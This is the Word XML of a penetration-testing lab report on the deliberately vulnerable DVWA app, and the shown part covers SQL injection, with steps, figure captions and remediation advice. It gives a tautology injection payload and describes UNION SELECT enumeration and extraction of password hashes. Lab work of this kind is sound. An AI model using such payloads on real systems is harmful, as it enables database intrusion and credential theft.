    <w:p w14:paraId="3A4DAD65" w14:textId="77777777" w:rsidR="00BD36F8" w:rsidRDefault="00BD36F8" w:rsidP="005C4611">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D6F7F54" w14:textId="77777777" w:rsidR="00BD36F8" w:rsidRDefault="00BD36F8" w:rsidP="005C4611">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="330A184F" w14:textId="5101CF03" w:rsidR="005C4611" w:rsidRPr="005C4611" w:rsidRDefault="005C4611" w:rsidP="005C4611">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Web Application Security Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25535A61" w14:textId="77777777" w:rsidR="005C4611" w:rsidRDefault="005C4611" w:rsidP="005C4611">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">This section documents the results of web application penetration testing performed against the DVWA (Damn Vulnerable Web Application) server. Four key vulnerabilities were identified and successfully exploited: SQL Injection, Stored Cross-Site Scripting (XSS), Unrestricted File Upload leading to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t>Webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution, and Reverse Meterpreter Shell access. Each test is described step by step with supporting evidence, impact analysis, and remediation recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436F2E4A" w14:textId="77777777" w:rsidR="005C4611" w:rsidRPr="005C4611" w:rsidRDefault="005C4611" w:rsidP="005C4611">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>A) SQL Injection — Database Enumeration and Credential Extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4F9545" w14:textId="69F68F1D" w:rsidR="005C4611" w:rsidRPr="005C4611" w:rsidRDefault="005C4611" w:rsidP="005C4611">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Demonstrate SQL Injection by enumerating database schema and extracting user credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571E2E04" w14:textId="52BE2DDD" w:rsidR="005C4611" w:rsidRPr="005C4611" w:rsidRDefault="005C4611" w:rsidP="005C4611">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD820E7" w14:textId="77777777" w:rsidR="005C4611" w:rsidRPr="005C4611" w:rsidRDefault="005C4611" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Security level in DVWA was set to </w:t>
      </w:r>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D730266" w14:textId="77777777" w:rsidR="005C4611" w:rsidRPr="005C4611" w:rsidRDefault="005C4611" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>A test payload ' or '1'='1 was injected into the User ID field, returning multiple user records, confirming the injection worked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70300401" w14:textId="77777777" w:rsidR="005C4611" w:rsidRPr="005C4611" w:rsidRDefault="005C4611" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Using UNION SELECT payloads, multiple database schemas were enumerated (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>, flag334422).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D168B6D" w14:textId="77777777" w:rsidR="005C4611" w:rsidRPr="005C4611" w:rsidRDefault="005C4611" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Usernames and MD5 password hashes were successfully extracted from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>dvwa.users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E18FD4" w14:textId="0B2C6BC9" w:rsidR="005C4611" w:rsidRDefault="005C4611" w:rsidP="005C4611">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Key Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E28FE7" w14:textId="77777777" w:rsidR="005404AB" w:rsidRDefault="003D36E7" w:rsidP="005404AB">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D36E7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D450037" wp14:editId="3496690E">
            <wp:extent cx="3010944" cy="2019631"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="523568537"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68537" name="Picture 42"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58808" cy="2051736"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="605347C0" w14:textId="466D0C0E" w:rsidR="005C4611" w:rsidRDefault="005C4611" w:rsidP="005404AB">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009379D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00904561" w:rsidRPr="009379D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="009379D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00621A2B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>SQL Injection payload returning multiple user records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE95C82" w14:textId="4E918FC8" w:rsidR="003D36E7" w:rsidRPr="005C4611" w:rsidRDefault="003D36E7" w:rsidP="005C4611">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D36E7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:noProof/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57770023" wp14:editId="47A2E0A9">
            <wp:extent cx="5341900" cy="3164619"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="602848995"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8995" name="Picture 44"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2079" cy="3176574"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F4893B" w14:textId="293FAB9C" w:rsidR="005C4611" w:rsidRDefault="005C4611" w:rsidP="005C4611">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621A2B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00982657" w:rsidRPr="00621A2B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00621A2B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00907DB7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enumeration of database names using UNION SELECT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB6FD32" w14:textId="129351A2" w:rsidR="003D36E7" w:rsidRPr="003D36E7" w:rsidRDefault="003D36E7" w:rsidP="003D36E7">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D36E7">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:noProof/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D2D3780" wp14:editId="730A0EE6">
            <wp:extent cx="5943600" cy="3773805"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2046375432"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75432" name="Picture 46"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73805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41419FA2" w14:textId="1235BB5E" w:rsidR="005C4611" w:rsidRPr="005C4611" w:rsidRDefault="005C4611" w:rsidP="002B63BD">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3525C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00FE74FB" w:rsidRPr="00E3525C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00E3525C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E3525C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Extracted usernames and password hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D95E5CB" w14:textId="77777777" w:rsidR="005C4611" w:rsidRPr="005C4611" w:rsidRDefault="005C4611" w:rsidP="005C4611">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:br/>
        <w:t>This SQL Injection vulnerability exposed the backend database, allowing enumeration of schema details and retrieval of sensitive credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9D4B5A" w14:textId="77777777" w:rsidR="005C4611" w:rsidRPr="005C4611" w:rsidRDefault="005C4611" w:rsidP="005C4611">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6094CA" w14:textId="77777777" w:rsidR="005C4611" w:rsidRPr="005C4611" w:rsidRDefault="005C4611" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Implement parameterized queries and prepared statements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFE4319" w14:textId="46C2554C" w:rsidR="005C4611" w:rsidRDefault="005C4611" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4611">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Validate and sanitize all user inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1305BFF5" w14:textId="77777777" w:rsidR="00E96B26" w:rsidRPr="00E96B26" w:rsidRDefault="00E96B26" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96B26">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Apply least privilege to database accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA1CCF4" w14:textId="77777777" w:rsidR="00E96B26" w:rsidRPr="00E96B26" w:rsidRDefault="00E96B26" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E96B26">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Configure error handling to avoid leaking SQL errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00409A44" w14:textId="77777777" w:rsidR="00E96B26" w:rsidRPr="00E96B26" w:rsidRDefault="00E96B26" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="200"/>
